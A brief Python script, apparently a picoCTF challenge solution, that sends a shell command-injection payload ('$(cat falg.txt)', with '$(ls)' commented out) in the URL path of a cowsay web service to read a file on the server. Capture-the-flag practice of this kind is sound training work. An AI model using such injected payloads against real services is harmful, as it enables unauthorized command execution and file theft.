#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p python3Packages.requests
# coding: utf-8

import json

import requests

BASE_URL = "https://caas.mars.picoctf.net/cowsay"

def main():
    # payload = "$(ls)"
    payload = "$(cat falg.txt)"
    r = requests.get(BASE_URL + f"/{payload}")
    print(r)
    print(r.text)

if __name__ == '__main__':
    main()

